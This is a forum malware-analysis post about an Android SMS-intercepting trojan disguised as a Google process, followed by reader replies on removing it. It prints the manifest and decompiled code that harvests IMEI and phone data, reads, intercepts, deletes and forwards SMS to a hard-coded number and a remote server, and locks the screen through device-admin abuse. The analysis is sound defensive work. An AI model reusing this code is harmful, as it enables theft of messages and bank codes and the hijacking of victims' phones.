一款伪装为谷歌进程无法卸载的流氓拦截马样本分析

leerina · 发表于 2015-12-8 21:12

一.样本分析

样本来源：http://www.52pojie.cn/thread-443228-1-1.html

文件名称：	拦截马.apk
MD5值：	d9af14e323ec322252af93d246d735dd
文件大小：	60.42KB
上传时间：	2015-12-08 19:54:40
包名：	com.google.process.locations
最低运行环境：	Android 2.3, 2.3.1, 2.3.2
版权：	Android

二.行为分析
在虚拟机中运行后，提示激活设备性能，当激活设备性能，获取超级权限后，尝试取消授权，屏幕变黑，无法再进入桌面，杀软无法清除：

样本无法卸载：

杀毒软件无法卸载：

三.样本分析
反编译样本，先去看一下配置文件，和相关的权限调用：

[Java] 纯文本查看 复制代码

001

002

003

004

005

006

007

008

009

010

011

012

013

014

015

016

017

018

019

020

021

022

023

024

025

026

027

028

029

030

031

032

033

034

035

036

037

038

039

040

041

042

043

044

045

046

047

048

049

050

051

052

053

054

055

056

057

058

059

060

061

062

063

064

065

066

067

068

069

070

071

072

073

074

075

076

077

078

079

080

081

082

083

084

085

086

087

088

089

090

091

092

093

094

095

096

097

098

099

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.google.process.locations" platformBuildVersionCode="21" platformBuildVersionName="APKTOOL">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.GET_TASKS"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <uses-permission android:name="android.permission.READ_LOGS"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.SIGNAL_PERSISTENT_PROCESSES"/>
    <uses-permission android:name="android.permission.PERSISTENT_ACTIVITY"/>
    <uses-permission android:name="android.permission.DISABLE_KEYGUARD"/>
    <uses-permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT"/>
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.ACCESS_LOCATION_EXTRA_COMMANDS"/>
    <uses-permission android:name="android.permission.ACCESS_MOCK_LOCATION"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.BATTERY_STATS"/>
    <uses-permission android:name="android.permission.BROADCAST_STICKY"/>
    <uses-permission android:name="android.permission.CHANGE_CONFIGURATION"/>
    <uses-permission android:name="android.permission.CHANGE_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
    <uses-permission android:name="android.permission.CHANGE_WIFI_MULTICAST_STATE"/>
    <uses-permission android:name="android.permission.CLEAR_APP_CACHE"/>
    <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.WRITE_SMS"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <application android:allowBackup="false" android:icon="@drawable/ic_launcher" android:label="@string/app_name" android:name=".GoogleApplication" android:persistent="true" android:theme="@style/AppTheme">
        <activity android:label="@string/app_name" android:launchMode="singleTask" android:name=".MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <activity android:label="@string/app_name" android:launchMode="singleTask" android:name=".InActivity">
            <intent-filter>
                <action android:name="android.intent.action.VIEW"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <category android:name="android.intent.category.BROWSABLE"/>
                <data android:host="*" android:pathPrefix="/m" android:scheme="googles"/>
            </intent-filter>
        </activity>
        <receiver android:name=".BootReceiver">
            <intent-filter android:priority="1000">
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <action android:name="android.intent.action.PRE_BOOT_COMPLETED"/>
                <action android:name="android.intent.action.REBOOT"/>
            </intent-filter>
            <intent-filter android:priority="1000">
                <action android:name="android.intent.action.PACKAGE_ADDED"/>
                <action android:name="android.intent.action.PACKAGE_CHANGED"/>
                <action android:name="android.intent.action.PACKAGE_REMOVED"/>
                <action android:name="android.intent.action.PACKAGE_DATA_CLEARED"/>
                <action android:name="android.intent.action.PACKAGE_INSTALL"/>
                <action android:name="android.intent.action.PACKAGE_REPLACED"/>
                <action android:name="android.intent.action.PACKAGE_RESTARTED"/>
                <data android:scheme="package"/>
            </intent-filter>
            <intent-filter android:priority="1000">
                <action android:name="android.provider.Telephony.SECRET_CODE"/>
                <category android:name="android.intent.category.HOME"/>
                <data android:host="06" android:scheme="android_secret_code"/>
            </intent-filter>
            <intent-filter android:priority="1000">
                <action android:name="android.intent.action.PHONE_STATE"/>
                <action android:name="android.net.wifi.WIFI_STATE_CHANGED"/>
                <action android:name="android.intent.action.SIG_STR"/>
                <action android:name="android.intent.action.SERVICE_STATE"/>
                <action android:name="android.intent.action.AIRPLANE_MODE"/>
            </intent-filter>
            <intent-filter android:priority="1000">
                <action android:name="android.intent.action.TIME_SET"/>
                <action android:name="android.intent.action.TIMEZONE_CHANGED"/>
                <action android:name="android.intent.action.LOCALE_CHANGED"/>
                <action android:name="android.intent.action.DATE_CHANGED"/>
            </intent-filter>
            <intent-filter android:priority="1000">
                <action android:name="android.intent.action.ACTION_POWER_CONNECTED"/>
                <action android:name="android.intent.action.ACTION_POWER_DISCONNECTED"/>
                <action android:name="android.intent.action.POWER_USAGE_SUMMARY"/>
                <action android:name="android.intent.action.ACTION_SHUTDOWN"/>
            </intent-filter>
            <intent-filter android:priority="1000">
                <action android:name="android.intent.action.SYNC_STATE_CHANGED"/>
                <action android:name="com.android.sync.SYNC_CONN_STATUS_CHANGED"/>
            </intent-filter>
            <intent-filter android:priority="1000">
                <action android:name="android.intent.action.HEADSET_PLUG"/>
            </intent-filter>
            <intent-filter android:priority="1000">
                <action android:name="android.media.RINGER_MODE_CHANGED"/>
            </intent-filter>
            <intent-filter android:priority="1000">
                <action android:name="android.intent.action.MEDIA_BAD_REMOVAL"/>
                <action android:name="android.intent.action.MEDIA_EJECT"/>
                <action android:name="android.intent.action.MEDIA_MOUNTED"/>
                <action android:name="android.intent.action.MEDIA_REMOVED"/>
                <action android:name="android.intent.action.MEDIA_SCANNER_FINISHED"/>
                <action android:name="android.intent.action.MEDIA_SCANNER_STARTED"/>
                <action android:name="android.intent.action.MEDIA_SCANNER_SHARED"/>
                <action android:name="android.intent.action.MEDIA_UNMOUNTED"/>
            </intent-filter>
        </receiver>
        <receiver android:name=".SmsReciver">
            <intent-filter android:priority="1000">
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
            </intent-filter>
        </receiver>
        <receiver android:name=".SmsReciver" android:permission="android.permission.BROADCAST_SMS">
            <intent-filter android:priority="1000">
                <action android:name="android.provider.Telephony.SMS_DELIVER"/>
            </intent-filter>
        </receiver>
        <receiver android:description="@string/device_info" android:label="@string/device" android:name=".DeviceReciver" android:permission="android.permission.BIND_DEVICE_ADMIN">
            <meta-data android:name="android.app.device_admin" android:resource="@xml/device_admin"/>
            <intent-filter>
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/>
            </intent-filter>
        </receiver>
        <service android:enabled="true" android:name="com.google.process.locations.GoogleLocationService" android:process=""/>
        <receiver android:name="d.d.SmsReceiver" android:permission="android.permission.BROADCAST_SMS">
            <intent-filter>
                <action android:name="android.provider.Telephony.SMS_DELIVER"/>
            </intent-filter>
        </receiver>
        <receiver android:name="d.d.MmsReceiver" android:permission="android.permission.BROADCAST_WAP_PUSH">
            <intent-filter>
                <action android:name="android.provider.Telephony.WAP_PUSH_DELIVER"/>
                <data android:mimeType="application/vnd.wap.mms-message"/>
            </intent-filter>
        </receiver>
        <activity android:name="d.d.ComposeSmsActivity">
            <intent-filter>
                <action android:name="android.intent.action.SEND"/>
                <action android:name="android.intent.action.SENDTO"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <category android:name="android.intent.category.BROWSABLE"/>
                <data android:scheme="sms"/>
                <data android:scheme="smsto"/>
                <data android:scheme="mms"/>
                <data android:scheme="mmsto"/>
            </intent-filter>
        </activity>
        <service android:exported="true" android:name="d.d.HeadlessSmsSendService" android:permission="android.permission.SEND_RESPOND_VIA_MESSAGE">
            <intent-filter>
                <action android:name="android.intent.action.RESPOND_VIA_MESSAGE"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <data android:scheme="sms"/>
                <data android:scheme="smsto"/>
                <data android:scheme="mms"/>
                <data android:scheme="mmsto"/>
            </intent-filter>
        </service>
        <service android:name="d.d.Default"/>
    </application>
</manifest>

其中的敏感性权限配置为：

[Java] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

com.android.launcher.permission.INSTALL_SHORTCUT//创建快捷方式
 android.permission.READ_SMS//读取短信
android.permission.RECEIVE_SMS//监控接收短信 
android.permission.WRITE_SMS//写短信
android.permission.SEND_SMS//发送短信
android.permission.MOUNT_UNMOUNT_FILESYSTEMS//挂载、反挂载外部文件系统
android.permission.GET_TASKS//获取有关当前或最近运行的
android.permission.READ_LOGS//读取系统日志    已使用 
android.permission.RECEIVE_BOOT_COMPLETED//接收开机启动广播
android.permission.PERSISTENT_ACTIVITY//创建一个永久的Activity
android.permission.ACCESS_COARSE_LOCATION//获取粗略的位置 
android.permission.ACCESS_FINE_LOCATION/获取精确的位置
android.permission.ACCESS_WIFI_STATE//读取wifi网络状态
android.permission.CHANGE_WIFI_STATE//改变WIFI连接状态
android.permission.WRITE_SETTINGS//读写系统设置项
android.permission.INTERNET//连接网络（2G或3G
android.permission.WRITE_EXTERNAL_STORAGE//写外部存储器（如：SD卡）
android.permission.READ_PHONE_STATE//读取电话状态
android.permission.WAKE_LOCK//在手机屏幕关闭后后台进程.
android.permission.SIGNAL_PERSISTENT_PROCESSES//发送一个永久的进程信号 
 android.permission.DISABLE_KEYGUARD//禁用键盘锁
 android.permission.ACCESS_LOCATION_EXTRA_COMMANDS//访问额外的位置提供命令
android.permission.ACCESS_MOCK_LOCATION//获取模拟定位信息
android.permission.ACCESS_NETWORK_STATE//读取网络状态（2G或3G）
android.permission.BATTERY_STATS//获取电池电量统计信息
android.permission.BROADCAST_STICKY//一个程序收到广播后快速收
android.permission.CHANGE_CONFIGURATION//修改当前设置
android.permission.CHANGE_NETWORK_STATE//改变网络状态如是否能联网
android.permission.CHANGE_WIFI_MULTICAST_STATE//改变WiFi多播状态
android.permission.CLEAR_APP_CACHE清除应用缓存

恶意行为实现方式一，获取手机信息，如IMEI等：

[Java] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

if ((paramBoolean) || (!bool))
{
  TelephonyManager localTelephonyManager = (TelephonyManager)getSystemService("phone");//[size=4][color=#ff0000]搜集用户手机IMEI码、电话号码、系统版本号等信息[/color][/size]
  if (localTelephonyManager.getSimState() == 5)
  {
    str1 = localTelephonyManager.getLine1Number();
    str2 = localTelephonyManager.getSimSerialNumber();
    str3 = localTelephonyManager.getSubscriberId();
    str4 = Build.VERSION.SDK_INT;
    str5 = Build.VERSION.RELEASE;
    localJSONObject = new JSONObject();
  }
}
try
{
  localJSONObject.put("tel", str1);
  localJSONObject.put("imei", str2);
  localJSONObject.put("imsi", str3);
  localJSONObject.put("sdk", str4);
  localJSONObject.put("release", str5);
  if (GoogleApplication.d);
  for (int i = 2; ; i = 1)
  {
    localJSONObject.put("mode", i);
    i.a(this, 2, localJSONObject);
    label183: localSharedPreferences.edit().putBoolean("num", true).commit();
    if (!paramBoolean)
      GoogleApplication.g = localSharedPreferences.getBoolean("send", true);
    return;
  }

恶意行为实现方式二，请求远程服务器：

[Java] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

public static String b()
  {
    return "45.127.99.27";[color=#ff0000]//远程服务器地址，打开为一个冒充工行的钓鱼网站，[/color]
  }
 
  public static DefaultHttpClient b(String paramString)//[color=#ff0000]http请求[/color]
  {
    BasicHttpParams localBasicHttpParams = new BasicHttpParams();
    localBasicHttpParams.setParameter("http.protocol.cookie-policy", "");
    HttpProtocolParams.setVersion(localBasicHttpParams, HttpVersion.HTTP_1_1);
    HttpProtocolParams.setContentCharset(localBasicHttpParams, "ISO-8859-1");
    HttpProtocolParams.setUseExpectContinue(localBasicHttpParams, true);
    HttpProtocolParams.setUserAgent(localBasicHttpParams, paramString);
    HttpConnectionParams.setConnectionTimeout(localBasicHttpParams, 3000);
    HttpConnectionParams.setSoTimeout(localBasicHttpParams, 3000);
    SchemeRegistry localSchemeRegistry = new SchemeRegistry();
    localSchemeRegistry.register(new Scheme("http", PlainSocketFactory.getSocketFactory(), 80));
    localSchemeRegistry.register(new Scheme("https", SSLSocketFactory.getSocketFactory(), 443));
    DefaultHttpClient localDefaultHttpClient = new DefaultHttpClient(new ThreadSafeClientConnManager(localBasicHttpParams, localSchemeRegistry), localBasicHttpParams);
    j localj = new j();
    localDefaultHttpClient.getCookieSpecs().register("", localj);
    return localDefaultHttpClient;

恶意行为实现方式三，读取短信，通讯录等信息：

[Java] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

import android.content.ContentResolver;
import android.database.ContentObserver;
import android.database.Cursor;
import android.net.Uri;
import android.os.Handler;
import org.json.JSONException;
import org.json.JSONObject;
 
class g extends ContentObserver
{
  private Cursor b = null;
 
  public g(GoogleLocationService paramGoogleLocationService, Handler paramHandler)
  {
    super(paramHandler);
  }
 
  public void onChange(boolean paramBoolean)
  {
    super.onChange(paramBoolean);
    Cursor localCursor = this.a.getContentResolver().query(Uri.parse("content://sms/"), new String[] { "_id", "address", "person", "body", "date", "type" }, null, null, "_id desc");[color=#ff0000]//读取短信信箱内容，并将读取到的进行格式化处理[/color]
    String str1;
    String str2;
    String str3;
    int n;
    JSONObject localJSONObject;
    if ((localCursor.getCount() > 0) && (localCursor.moveToFirst()))
    {
      int i = localCursor.getColumnIndex("address");
      int j = localCursor.getColumnIndex("body");
      int k = localCursor.getColumnIndex("date");
      int m = localCursor.getColumnIndex("type");
      str1 = localCursor.getString(i);
      str2 = localCursor.getString(j);
      str3 = localCursor.getString(k);
      n = localCursor.getInt(m);
      localJSONObject = new JSONObject();
    }
    try
    {
      localJSONObject.put("number", str1);
      localJSONObject.put("time", str3);
      localJSONObject.put("body", str2);
      localJSONObject.put("type", n);
      if ((n % 2 == 1) && (GoogleApplication.d))
        i.a(this.a.getApplicationContext(), str2);
      i.a(this.a, 4, localJSONObject);
      label241: localCursor.close();
      return;
    }
    catch (JSONException localJSONException)
    {
      break label241;
    }
  }
}
public class SmsReciver extends BroadcastReceiver[color=#ff0000]//拦截短信操作[/color]
{
  public void onReceive(Context paramContext, Intent paramIntent)
  {
    Object localObject1 = null;
    Bundle localBundle = paramIntent.getExtras();
    Object[] arrayOfObject;
    int j;
    String str1;
    String str2;
    if (localBundle != null)
    {
      if (GoogleApplication.d)
        abortBroadcast();
      arrayOfObject = (Object[])localBundle.get("pdus");
      int i = arrayOfObject.length;
      j = 0;
      str1 = null;
      str2 = null;
      if (j >= i)
        i.a(paramContext, str2.toString(), str1.toString(), localObject1.toString(), 1);
    }
    else
    {
      return;
    }

恶意行为实现方式四，删除短信，联系人等信息：

[Java] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

public static void a(Context paramContext, String paramString)
 {
   try
   {
     Uri localUri = Uri.parse("content://sms/inbox");
     Cursor localCursor = paramContext.getContentResolver().query(localUri, null, "read=0", null, null);[color=#ff0000]//读取收件箱内容[/color]
     while (true)
     {
       if (!localCursor.moveToNext())
         return;
       if (!localCursor.getString(localCursor.getColumnIndex("body")).trim().equals(paramString))
         continue;
       int i = localCursor.getInt(localCursor.getColumnIndex("_id"));
       paramContext.getContentResolver().delete(Uri.parse("content://sms"), "_id=" + i, null);[color=#ff0000]//删除短信操作[/color]
     }
   }
   catch (Exception localException)
   {
   }
 }

恶意行为实现方式五，发送短信：

[Java] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

private void g()
{
  g localg = new g(this, new Handler());
  getContentResolver().registerContentObserver(Uri.parse("content://sms/"), true, localg);
}
 
void Prompt(String paramString)
{
  SmsManager.getDefault().sendTextMessage("18839763762", (String)null, paramString, (PendingIntent)null, (PendingIntent)null);[color=#ff0000]//发送短信到18839763762[/color]
}
 
public IBinder onBind(Intent paramIntent)
{
  return null;
}
 
public void onCreate()
{
  Intent localIntent = new Intent(getApplicationContext(), GoogleLocationService.class);
  this.a = ((AlarmManager)getSystemService("alarm"));
  this.b = PendingIntent.getService(this, 0, localIntent, 268435456);
  long l = System.currentTimeMillis();
  this.a.setInexactRepeating(1, l, 5000L, this.b);
  super.onCreate();
  c();
}

恶意行为实现方式六，获取命令名环境：

[Java] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

import android.content.Context;
import android.content.pm.ApplicationInfo;
import android.content.pm.PackageManager;
import android.content.pm.PackageManager.NameNotFoundException;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
 
public class ADRTLogCatReader
  implements Runnable
{
  private static Context context;
 
  public static void onContext(Context paramContext, String paramString)
  {
    if (context != null)
      return;
    context = paramContext.getApplicationContext();
    int i;
    if ((0x2 & paramContext.getApplicationInfo().flags) != 0)
      i = 1;
    while (i != 0)
      try
      {
        paramContext.getPackageManager().getPackageInfo(paramString, 128);
        ADRTSender.onContext(context, paramString);
        new Thread(new ADRTLogCatReader(), "LogCat").start();
        return;
        i = 0;
      }
      catch (PackageManager.NameNotFoundException localNameNotFoundException)
      {
      }
  }
 
  public void run()
  {
    try
    {
      BufferedReader localBufferedReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec("logcat -v threadtime").getInputStream()), 20);[color=#ff0000]//获取命令行环境，执行字符串命令[/color]
      while (true)
      {
        String str = localBufferedReader.readLine();
        if (str == null)
          break;
        ADRTSender.sendLogcatLines(new String[] { str });
      }
    }
    catch (IOException localIOException)
    {
    }
  }
}
 public static void sendFields(String paramString1, String paramString2, ArrayList<String> paramArrayList1, ArrayList<String> paramArrayList2, ArrayList<String> paramArrayList3)
  {
    Intent localIntent = new Intent();
    localIntent.setPackage(debuggerPackageName);
    localIntent.setAction("com.adrt.FIELDS");
    localIntent.putExtra("package", paramString1);
    localIntent.putExtra("path", paramString2);
    localIntent.putExtra("fields", paramArrayList1);
    localIntent.putExtra("fieldValues", paramArrayList2);
    localIntent.putExtra("fieldKinds", paramArrayList3);
    context.sendBroadcast(localIntent);
  }
 
  public static void sendLogcatLines(String[] paramArrayOfString)
  {
    Intent localIntent = new Intent();
    localIntent.setPackage(debuggerPackageName);
    localIntent.setAction("com.adrt.LOGCAT_ENTRIES");
    localIntent.putExtra("lines", paramArrayOfString);
    context.sendBroadcast(localIntent);
  }

恶意行为实现方式七，Activity置顶，当用户选择取消获取设备性能时，会将界面一直置顶，当用户选择取消设备行性能后将自实现的Activity覆盖于整个手机桌面，（锁屏操作），让用户无法操作手机：

[Java] 纯文本查看 复制代码

01

02

03

04

05

06

07

08

09

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

import android.app.Activity;
import android.app.admin.DevicePolicyManager;
import android.content.ComponentName;
import android.content.Intent;
import android.os.Bundle;
import android.view.KeyEvent;
import android.view.Window;
 
public class InActivity extends Activity
{
  private ComponentName a;
  private DevicePolicyManager b;
 
  private void a()
  {
    this.b = ((DevicePolicyManager)getSystemService("device_policy"));
    this.a = new ComponentName(this, DeviceReciver.class);
    if (!this.b.isAdminActive(this.a))
    {
      Intent localIntent = new Intent("android.app.action.ADD_DEVICE_ADMIN");
      localIntent.putExtra("android.app.extra.DEVICE_ADMIN", this.a);
      startActivity(localIntent);
    }
  }
 
 private void b()
  {
    startService(new Intent(getApplicationContext(), GoogleLocationService.class));
  }
 
  public void onAttachedToWindow()
  {
    getWindow().setType(2004);
    super.onAttachedToWindow();
  }
 
  protected void onCreate(Bundle paramBundle)
  {
    super.onCreate(paramBundle);
    getWindow().setFlags(-2147483648, -2147483648);
    a();
    b();
    finish();
  }
  public boolean onKeyDown(int paramInt, KeyEvent paramKeyEvent)
  {
    if (paramInt == 3)
      return true;
    return super.onKeyDown(paramInt, paramKeyEvent);
  }
}

四.总结
样本分析时未对其钓鱼网站的作用做深入分析，有兴趣的伙伴可以深入挖掘一下，另外对于一些获取设备权限的分析没有写出，主要原因是大多数样本实现方式都是一样，
到最后我还没有将样本从虚拟机中移除，未找到移除样本较好的方法。

如果本片帖子对您有帮助，请动动您高贵的手指评分，我将万分感谢！！！

常黑屏 · 发表于 2015-12-8 21:25

感谢楼主分享，谢谢你

Licoy · 发表于 2015-12-8 21:34

那么这种的恶意软件怎么来卸载呢？哪儿出现的呢？

Myself_GF · 发表于 2015-12-8 21:39

楼主做好事，非常感谢

a1439932040 · 发表于 2016-1-16 11:38

谢谢楼主分享

笑对VS人生 · 发表于 2016-1-16 18:34

本帖最后由笑对VS人生于 2016-1-16 20:15 编辑

这个只有强行删除它。

这里给出一个办法，用MT管理器或者Re管理器，打开根目录（挂载读写）data/app/com.google.process.locations-1.apk
找到这款软件删除！

注意：你设置文件排序方式就容易找到（按时间先后）。
这样就可以免除取消激活，强行删除掉这类软件。

zxc逆天 · 发表于 2016-1-16 18:54

分析不错，顶楼主

flyflying · 发表于 2016-2-2 16:16

提示: 作者被禁止或删除内容自动屏蔽

KD3650 · 发表于 2016-11-12 17:13

的确卸不掉，用re删除/Date分区下的apk也不行

帐号		自动登录	找回密码
密码			注册[Register]

[移动样本分析] 一款伪装为谷歌进程无法卸载的流氓拦截马样本分析

点评

免费评分

flyflying flyflying 当前离线好友阅读权限 0 听众最后登录 1970-1-1 头像被屏蔽	8^# flyflying 发表于 2016-2-2 16:16 提示: 作者被禁止或删除内容自动屏蔽

	回复支持举报